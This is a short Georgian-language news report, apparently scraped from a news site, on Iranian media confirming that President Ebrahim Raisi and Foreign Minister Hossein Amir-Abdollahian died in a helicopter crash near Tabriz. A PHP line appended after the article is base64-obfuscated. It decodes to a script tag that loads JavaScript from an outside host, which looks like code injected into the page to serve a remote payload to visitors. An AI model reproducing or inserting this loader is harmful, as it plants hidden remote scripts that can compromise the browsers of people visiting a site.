celsiusi
ავერსი საქკაბელი

ირანული მედია პრეზიდენტ იბრაჰიმ რაისისა და საგარეო საქმეთა მინისტრის, ჰოსეინ ამირ-აბდოლაჰიანის დაღუპვას ადასტურებს. ინფორმაციას „სიენენი“ ავრცელებს.

მედიის ინფორმაციით, ვერტმფრენში მყოფი ყველა პირი დაიღუპა.

მანამდე ირანელმა მაღალჩინოსნებმა განაცხადეს, რომ ვერტმფრენს, რომელშიც ცხრა პირი იმყოფებოდა, უამინდობის გამო პრობლემები შეექმნა.

სამძებრო-სამაშველო სამუშაოები მთელი ღამის განმავლობაში მიმდინარეობდა.

მედიის ცნობით, რაისი ირან-აზერბაიჯანის სასაზღვრო ზონიდან ბრუნდებოდა და ჩრდილო-დასავლეთით მდებარე ქალაქ თავრიზისკენ მიემართებოდა. მანამდე, ირანისა და აზერბაიჯანის პრეზიდენტებმა კაშხლის გახსნის ცერემონიაში მიიღეს მონაწილეობა.

ვერტმფრენში, პრეზიდენტის გარდა, რვა პირი იმყოფებოდა, მათ შორის, ირანის საგარეო საქმეთა მინისტრი ჰოსეინ ამირ-აბდოლაჰიანი. 

221
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");